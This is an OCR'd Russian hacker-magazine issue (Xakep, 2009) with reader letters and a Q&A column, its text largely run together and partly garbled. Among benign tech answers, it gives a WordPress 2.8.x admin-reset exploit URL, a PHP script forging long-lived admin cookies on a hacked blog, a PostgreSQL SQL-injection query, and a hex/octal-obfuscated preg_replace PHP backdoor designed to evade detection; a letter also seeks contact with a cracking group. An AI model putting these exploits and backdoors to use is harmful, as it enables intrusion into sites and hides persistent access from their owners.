книги хакеры / журнал хакер / 129_Optimized

ОТ: Toinbis Makaroinbis <toinbis@gmail.com>

ТЕМА: ***помощь

Добрийден, Никита, есливынепротив, будуписатпаангелску. [google translate]

Преждевсего— поздравилсЛитвой.

Явыросслитовскимиверсия«Xakep», большиевремена, которое, дажеудалоськупитьanonymizer. com счетспомощьюкредитнойкартынекоторыхпарень, чьеписьмоends@microsoft.com. Netbios ошибоквWindows 98 — многовесельябыло, илиповешениеполовиныкомпьютероввInfoBalt компьютернойконференциис C: \ Con \ Con трюк— спасибовам, все, чтоузналимногополезной удовольствиеотвас, но, вероятно, этосамаяразбудилилюбопытствобылосамоелучшее, чтоя получилотчтения«Xakep» -- онучил, чтовсегдаестьдругойспособсделатьэто, темлучше, ичтоэто удовольствиепытаютсяеенайти. Любознательность, котораяпомогаетнетолькоприрасчете, нои вовсехсферахжизни. Спасибо, ребята! СуществуетоднаскромнаяпросьбапомочьУменя. Делов том, чтомнедействительнонужносвязатьсяsomone, ктознает, кого-тоиз«RISE команда» взломщикиколлектива. Причина, мненужносвязатьсяссостоитвтом, чтобыпредложитьновуюверсию программногообеспечения, ониужедотрещины. Несвязанныестрещинамивариантновойверсии предоставляетсятолькодлякорпоративныхклиентов, такчто, возможно, онибыintereseted сами получитьего... ЛипопытатьсязагрузитьвсесвоитрещиныипроверитьNFOs (30 насегодняшний день...;), ноадресаэлектроннойпочты, ониобеспечиваютЕстьбольшенедействует. Попыткаобъединить# крекерынаFreeNode, нопредложитьтолько.

Почемуянаписаниявами? ПричинаРоссиядаларождениевадмноготалантливыхпрограммистов / хакеров/ крекеров, и, ядумаю, выиликто-товновостях(естьодин? Иливысработыдомой? Просто излюбопытства— работалвкачествежурналистаядовольнодолгоевремя...), возможно, знают некоторыеизних, ионимоглибызнать... тем, чтоцепочкабудетзаканчиватьсяна«Rise КОМАНДА». Пожалуйста, еслиуделатькакие-либотипконтакта, которыйвысчитаете, моглибымнепомочь, ябы оченьпризнательныВамсравняласьсомной. Чтоямогбыобещатьвзамен? Давайтеговоритьотом, чтобысделать10 хорошихвещейвэтоммесяце, чтоможетсделатьмирнемноголучше...

[/google translate]

Спасибозавашевремя, поздравлениеотВилнюс, можитеотвечатпаРуский, Тomas

ПРИВЕТ, ТОМАС!

ПосколькуВолодарскийвежливо отказалсяперевестидлянаствоесообщение, атакжесцельюприведения английскойирусскойчастиписьма кединообразномустилюизложения, мырешиливоспользоватьсяуслугами google translate. Итак, вотчтомы имеемтебесказатьпорезультатам прочтенияданногоперевода. Во-первых, спасибозаписьмо— мы тожевспомнилилитовскуюверсиюz исбольшимудовольствиемперечиталинашистатьи, переведенные налитовскийязык. Мыникогдаине думали, чтонаписанныенамитексты могутвыглядетьстольприкольно(без обид:)). Вашаверсияжурналабыла потоньше, статейвней— поменьше, новсежеэтобылнаш, роднойz. Насчеттвоейпросьбы— сходуответить трудно, посмотримванналах. Кроме того, этописьмобудетопубликованов журнале, поэтому, можетбыть, нужный человектебясаминайдет. Удачи!

САМОЕ ДУРАЦКОЕ ПИСЬМО НОМЕРА

ОТ: 123 123 cl.k@list.ru <alex-rus@live.ru>

ТЕМА: n/a

анасчёттойх**нисостатьямиужизвини, деньгинужныбылиочень, поэтомуповторялся, теперьпонялчтоваснена***еш, ... реально прошуизвененй

Письмо, форварднутоемнепожелавшимостатьсянеизвестным редактором, порадовало. Знакомаяситуация, особеннобылокруто, когдаавторпыталсясдатьГорлустатью, написаннуюсамимже Горлумомпару-тройковмесяцамиранее. Ну, такпрямоисделал— слилегостатьюссайта, особонеразбирался, изменилимяавтора исдалвсеэтохозяйствомногострадальномуредактору. Круче былотолькотогда, когдастудентысдалимнеисторииболезнипо моимжебольным(какаспиранткафедры, яиногдадолженвести студентов), которыенеимелисреальнымибольныминичего общего. Ну, лечилябольнуюотвоспалениялегких— амнестудент счестнымиглазамипредъявляетподэтуфамилиюскачанныйиз инета«передне-распространенныйинфарктмиокарда».

UNITS

/ HTTP://WAP-CHAT.RU /

Q: ЧтоновенькогоизуязвимостейвWordPress появилосьвпоследнеевремя?

A: НедавнонекийLaurent Gaffie обнаружилв последней(наданныймомент) версии2.8.3 сабжевогодвижкадлясозданияблоговзамечательныйбаг, позволяющийбезкаких-либо подтвержденийсброситьпарольадмина. Если тывнимательночиталмоиэтюдыпровордпресс впредыдущихномерахжурнала, то, наверняка, долженпомнитьоподобномбагевWordPress <= 2.6.1. Тогда(впрочем, какисейчас) багпозволялскинутьпарольадминапривключенной регистрациинаблогеихитрыхманипуляцях собрезаниемпробеловвмускуле. Сейчасже всегораздопроще— регистрацияненужна, ноновыйпароль, какипрежде, узнаеттолько законныйвладелецадминскогомыла. Для

эксплуатациибагатебевсеголишьнеобходимо пройтипоссылкевидаhttp://DOMAIN_NAME. TLD/wp-login.php?action=rp&key[]=. Приэтом парольуспешносбросится:). Работаетфишка тольков2.8.x веткеипроявляетсявследующем кодевwp-login.php:

function reset_password($key) { global $wpdb;

$key = preg_replace( '/[^a-z0-9]/i', '', $key);

if ( empty( $key ) )

return new WP_Error('invalid_ key', __('Invalid key'));

$user = $wpdb->get_row($wpdb ->

prepare("SELECT * FROM $wpdb -> users WHERE user_activation_key = %s", $key));

...

}

Здесь функция prepare() приводит наш массив $key к строковому типу, вследствие чего $key становится пустым и подходит абсолютно для всех записей в таблице пользователей. Как видишь, для этой замечательной уязвимости можно написать массовый эксплойт, который превратит жизнь админов вордпрессовских блогов в хаос. Но, так как практической пользы от этого нехитрого действа для тебя не будет никакой, я не советую заниматься такими пакостями.

P.S. Подробноеadvisory смотрипоссылке http://packetstormsecurity.org/0908-exploits/ wordpress-adminreset.txt.

Q: ВзломалблогнаWordPress. Какбымнетеперь заполучитьадминскиекукинаслучай, еслимой шеллудалят?

A: Механизмгенерациикукисовввордпрессе неизсамыхпростых, но, немногопокуривисходники, можносоставитьнебольшойскрипт, отвечающийзавыводэтихсамыхпресловутых кукиснаэкран:

<?php

include './wp-includes/wp-settings. php';

//ищем секретный ключ из конфига и соль из базы

function wps()

{

global $wp_default_secret_key; $w = $wp_default_secret_key; if(defined('SECRET_KEY') &&

$w != SECRET_KEY) $secret_key = SECRET_KEY; if(defined('AUTH_KEY') &&

$w != AUTH_KEY) $secret_key = AUTH_KEY;

$salt=get_option('auth_salt'); if(empty($salt))

$salt = get_option('secret'); return $secret_key.$salt;

}

//функция генерирует авторизационные кукисы

function auc($u = 'admin')

{

global $wp_version;

$s = ($wp_version != '2.5'') ? '|' : '';

$t = 2107184816;

return $u.'|'.$t.'|'.hash_ hmac('md5', $u.$s.$t,hash_ hmac('md5',$u.$s.$t,wps()));

}

//выводим на экран

print AUTH_COOKIE.'='.auc(); ?>

Кодвыведетдлятебягодныевтечение10 лет кукипользователяadmin.

Q: НашелSQL-инъекциювдвижке, которыйиспользуетPostgreSQL, ноникакнемогуполучить доступкбазеInformation_schema. Незнаешь, в чемдело?

A: Вероятней всего, тебе попалась старая версия PostgreSQL, в которой попросту не существовало Information_schema. К счас-

тью, в то время было некое жалкое подобие этой базы под названием PG_TABLES. Как следует из названия, отсюда мы сможем узнать только таблицы, но никак не колонки (их придется подбирать вручную). Итак, исходя из того, что здесь названия таблиц хранятся в колонке TABLENAME, можно составить примерный запрос для эксплуатации твоей скули:

http://www.site.com/postgre. php?id=-999 union select TABLENAME,null,null,null,null from PG_TABLES limit 1 offset 0--

Q: Хочусоздатьсвойстартап, нонужнакакая-ли- бооригинальнаяидея. Отсюдавопрос: какиезападныестартапысчитаютсясамымиуспешными винтернете?

A:Еслиисходитьизформата«Top 10», томожно выделитьследующиемегауспешныевеб-стар- тапыпоследнихнесколькихлет:

1.MySpace (http://www.myspace.com), социаль-

наясеть, основанавиюле2003 года;

2.YouTube (http://www.youtube.com), видеохос-

тинг, основанвфеврале2005 года;

3.Facebook (http://www.facebook.com), соци-

альнаясеть, основанавфеврале2004 года;

4.Wikipedia (http://www.wikipedia.org), wikibased энциклопедия, январь2001;

5.Bebo (http://www.bebo.com), социальная сеть, январь2005 года;

6.Digg (http://www.digg.com), социальнаясеть новостей, ноябрь2004 года;

7.Flickr (http://www.flickr.com), фотохостинг,

февраль2004;

8.Netvibes (http://www.netvibes.com), твоя стартоваястраницаинтернета, сентябрь2005;

9.Del.icio.us (http://del.icio.us), социальные закладки, конец2003 года;

10.Meebo (http://www.meebo.com), онлайн-

мессенджер, сентябрь2005 года.

Каквидноизвышеприведенногосписка, все самыелакомыеидеиизегоначалаужезаняты русскимистартаперами. Конецжеспискавполнесвободендлярунета. Такчто, действуй:).

Q:СделалкартуVISA насервисеEpassporte.

com. Всемдоволен, кромемизерноголимитана снятиеденегвбанкоматах— 320 баксоввдень. Какподнятьэтотлимит?

A:Еслитынехочешьпользоватьсямудреными инструкциямипоувеличениюлимитовсамого епасса(пунктменю«Increase your limits» в

админке), тосоветуювоспользоватьсясерви-

сомePayService (http://www.epayservice.ru),

которыйпредлагаетсвоимклиентамполучить картуVisa Electron ePassporte сизначально установленнымдневнымлимитомнаснятие наличностидо$25.000.

Для открытия счета в ePassporte с помощью сайта необходимо, чтобы на твоем счету в EPS Banking Online находилась сумма не менее $50 ($10 уже будет у тебя на карте). Стоимость открытия счета зависит от дневного лимита на снятие наличности по карте ePassporte и может составлять от $50 до $300 в зависимости от дневного лимита ($520-$25.050). Сроки изготовления карты

— 10-14 рабочих дней; сроки доставки: курьерской почтой (+$100) 3-4 рабочих дня, обычной почтой — около 3-х недель.

Q:Подскажи, какимобразомможнонадежней всегооставитьсвойбэкдорнасайте, движок которогонаписаннаphp? Способсeval(base64_ decode()) ужеоченьхорошопалится.

A:Действительно, найтизлонамеренныйкод, вызываемыйчерезфункциюeval, всвоих скриптахпрощепростого(например, можно использоватьвсемилюбимыйgrep eval ./*). Поэтомупытливыеумыхакеровпридумывают всеновыеиновыеспособыхитрогоинжекта бэкдороввphp-скрипты.

Итак, сначаланемноготеории. Какты, наверняка, ужезнаешь, замечательнаяфункция preg_replace() позволяетвыполнятьлюбойкод спомощьюмодификатора«e»:

<?php preg_replace('@(.+)@ ie',"\\1",'phpinfo();'); ?>

Этанехитраярегуляркавполнеуспешно выведетнатвойэкранрезультатвыполнения функцииphpinfo(). Теперьзададимсявопросом: почемубынамнесконструироватьсвойбэкдор спомощьюpreg_replace()? Сделатьэтоможно, например, так:

<?php preg_replace('@(.+)@ie',

'eval("\\1");', '$_REQUEST[cmd]’);

?>

Кодбудетвыполнятьлюбуюphp-конструкцию, переданнуювскриптспомощьюпараметра cmd. Кпримеру, тактысможешьвывестина экранphpinfo():

http://site.com/backdoor.php?

cmd=phpinfo();

Вэтомспособевсехорошо, крометого, чтоон замечательнопалитсяиз-заналичиямодифи- катора«e» ивызоваeval. Конечно, можноэто делозамаскироватьспомощьютогожеbase64, нополученныйкодвсеещебудеточеньподозрительнымикрайнелегкимдлярасшифровки. Здесьнельзяневспомнитьособенностьphp, котораязаключаетсявтом, чтошестнадцатеричные(hex) ивосьмеричные(oct) символы можноиспользоватьвкачествепараметров функцииипростовкачествеальтернативного способанаписаниялюбыхстрок(использовать этисимволынеобходимовдвойныхкавычках). Привожупримерфункции, котораязакодирует любуюстрокувнужноенампредставление (причем, hex иoct будутчередоватьсядля усложнениядешифровкистроки):

function str2hexoct($str)

{

$str2hex = urldecode($str); $returnstr='';

for($i=0;$i<strlen($str);$i++)

{

$hex=dechex(ord($str[$i]));

if($i % 2 != 0)

{

$hex=base_convert( $hex, 16, 8);

$returnstr .= "\\$hex";

}

else

$returnstr .= "\\x$hex";

}

return $returnstr;

}

Теперьзаюзаемэтуфункциюдляшифровкивышеприведенныхаргументовфункции preg_replace():

<?php

function str2hexoct($str)

{

...

}

UNITS

/ HTTP://WAP-CHAT.RU /

$my_code = 'preg_replace("'. str2hexoct('@(.+)@ie').'","'.st r2hexoct('eval("\\1");').'","‘. str2hexoct('$_REQUEST[cmd]').'");'; print $my_code;

?>

Послевыполненияскриптвыведетнаэкран следующеезначение, котороевполнеуспешно можноюзатьдлябэкдоровбезвсякихeval и base64:

preg_replace("\x40\50\x2e\53\ x29\100\x69\145", "\x65\166\ x61\154\x28\42\x5c\61\x22\51\x3b", "\x24\137\x52\105\x51\125\x45\123\ x54\133\x63\155\x64\135");

Каквидишь, теперьвсеаргументынашейфункциизашифрованывhex иoct представлении. Кстати, своюработоспособностьотэтогоонане потерялаивсетакжевыполнитдлятебялюбой php-кодчерезпереданныйскриптупараметр cmd :)

Q: СлышалосозданиинейроннойсетипораспознаваниюкапчинаJavaScript. Гдеможноузнать обэтомпоподробней?

A:Действительно, некийShaun Friedle написалнаобычномjavascript OCR-модуль дляраспознаванияcaptcha насервисе megaupload.com. Модульпредставляетсобой искусственнуюнейроннуюсетьдляработыс картинкамиспомощьюHTML 5 js-функции getImageData. Посмотретьпримерработыи прочитатьтехническиедеталиможноздесь: http://herecomethelizards.co.uk/mu_captcha,

аисходныйкодскриптанаходитсяпоадресу http://userscripts.org/scripts/review/38736.

Q:Естьнеобходимостьтранслироватьвидео(например, свеб-камеры) винет. Враспоряжении естьсервер. Каклучшеэтореализовать?

A:Насамомделе, вариантовмножество. Если братьконкретныепрограммныепродукты дляорганизациивеб-трансляции, тосоветую взглянутьвсторонуwebcamXP Pro (http:// www.webcamxp.com), VLC (www.videolan.org/ vlc) ичрезвычайномощногоWowza Media Server (http://www.wowzamedia.com). Можно такжепопробовать: ffserver (http://ffmpeg. org/ffserver-doc.html), camserv (http://cserv. sourceforge.net), webcam-server (http:// webcamserver.sourceforge.net).

Однимизсамыхпрактичныхвариантов, пожалуй, являетсятрансляциявидеочерезFlashплеер— втакомслучаесвоспроизведениемне будетпроблемубольшинствапользователей. Реализоватьможноспомощьюдвухпродук-

тов: Adobe Flash Media Encoder (http://www. adobe.com/products/flashmediaencoding) и Adobe FMS (http://www.adobe.com/products/ flashmediaserver/flashmediaencoder). Тожеса-

моевполнереальноорганизоватьспомощью опен-сорсногопродуктаRed5 (http://osflash.

142

org/red5). Особенноприятно, чтовидеовэтом случаеможнотранслироватьснескольких камеродновременно.

Q: Яхочутранслироватьвинетвидеосмоей веб-камеры. Какэтосделатьбезсобственного сервера?

A:Самыйпростойвариант— заюзатьспециальныесервисыдляорганизациитрансляции. Такойфункционалестьнаsmotri.com, rutube.ru иyatv.ru. Последний, кстати, покамалонагруженибуквальнолетает.

Q:Слышал, естьнекийкитайский«офис» — полныйклонпродуктаотMS. Гденайти?

A:Да, сделатьполныйклонидатьвозможность клиентамприобрестиболеедешевыйпродукт

— былоглавнойзадачейпрограммистов

ElOffice (http://www.evermoresw.com). Проект разрабатывается9 лет, написаннаJava, есть версиидляWindows, Linux иSymbian OS. Име-

етсябета-версиядляработывонлайнечерез браузер.

Q: ЕстьливWindows аналогкомандыuname, чтобыбыстроопределитьверсиюсистемы? Ато, бывает, получишьдоступкcmd.exe, аопринадлежностихостактойилиинойОСприходится судитьпокосвеннымпризнакам.

A: Такаякомандаесть: ver. Например, наофисномкомпьютере«Геймленда» командавыдает:

C:\usr>ver

Microsoft Windows XP [Версия 5.1.2600]

Этоозначает, чтовкачествеоперационки используетсяWindows XP

Q: Яживувпровинции, гдедосихпоринеттарифицируетсяпотрафику, абезлимитныхтарифов поадекватнымценамнет. Ивсебыничего, если быненеобходимостьобщатьсясработодателем (яфрилансер) поSkype. Этазаразажретчертовскимноготрафика, дажееслизвонкинепосредственнонеосуществляются. Ведьестьжеаналог, носменьшимпотреблениемтрафика?

A:Да, действительно: Skype можетиспользоватьчастьполосытвоегоканалавлюбое время, когдаонзапущен. Благодаряэтому удаетсяобеспечитьсвязьналюбыхкомпьютерах, даженаходящихсязаNAT. Увы: страдают те, укогокаждыймегабайтпо-прежнемуна счету. Вкачествеальтернативыможнопопро- боватьVoIP-сервисnonoh.net. Клиент, конечно, серьезнопроигрываетпоудобствуSkype, но затоотличаетсяминимальнымпотреблением трафикаибесплатнымизвонкамивомногие страны, авРоссии— вМосквуиПитер.

Q:ПоставилCentOS, нообратитьсякмоимслужбамLDAP никтонеможет. Какэтоисправить?

A:Деловтом, чтоконфигурацияIptables всис-

темах CentOS / Red Hat / RHEL / Fedora Linux не позволяетосуществитьвходящиесоединения

кслужбамLDAP. НужнооткрытьпортыTCP #389 иTCP # 636, добавивследующиестрочкив/etc/ sysconfig/iptables:

-A RH-Firewall-1-INPUT -s 192.168.1.0/24 -m state --state NEW -p tcp --dport 389 -j ACCEPT

-A RH-Firewall-1-INPUT -s 192.168.1.0/24 -m state --state NEW -p tcp --dport 636 -j ACCEPT

Затемнеобходимообновлениеслужбыiptables

командой«service iptables reload». Послеэтого подключениебудутприниматьсяотовсехкомпьютеровизподсети192.168.1.0/24.

Q: ЕстьнесколькоконфиговвXML, гдевседанныенаписаныоднойстрокой. Подскажи, естьли способавтоматическиотформатироватьфайлы так, чтобыпоявилисьотступывсоответствиисо вложенностьюэлементов?

A: Чтобыпревратитьнепонятнуюкашув опрятныйXML-файл, можновоспользоваться готовымXSL-преобразованием:

<xsl:stylesheet version="1.0" xmlns:xsl="http://www.

w3.org/1999/XSL/Transform»> <xsl:output method="xml"/> <xsl:param name="indent-increment" select="' '" />

<xsl:template match="*"> <xsl:param name="indent"

select="' '"/>

<xsl:value-of select="$indent"/> <xsl:copy>

<xsl:copy-of select="@*" /> <xsl:apply-templates>

<xsl:with-param name="indent" select="concat($indent,

$indent-increment)"/> </xsl:apply-templates> <xsl:value-of select="$indent"/>

</xsl:copy>

</xsl:template>

<xsl:template match="comment()|processinginstruction()">

<xsl:copy /> </xsl:template>

<!-- WARNING: this is dangerous. Handle with care --> <xsl:template match="text()[normalizespace(.)='']"/>

</xsl:stylesheet>

ПрименитьXSL-преобразованиекXML-файлу можноспомощьюутилитыxmlstarlet (http:// xmlstar.sourceforge.net). z

XÀÊÅÐ 09 /129/ 09

x№ 09(129) СЕНТЯБРЬ 2009

2009 )²¦®³À¢±½( 09 x

VOIP «© µ© ¥±´¤©¦ © ¯°±¦¥¦¬©³¦¬¦ª ¡®­¯¢ /¦±­®¯ ¸´§¯ª

129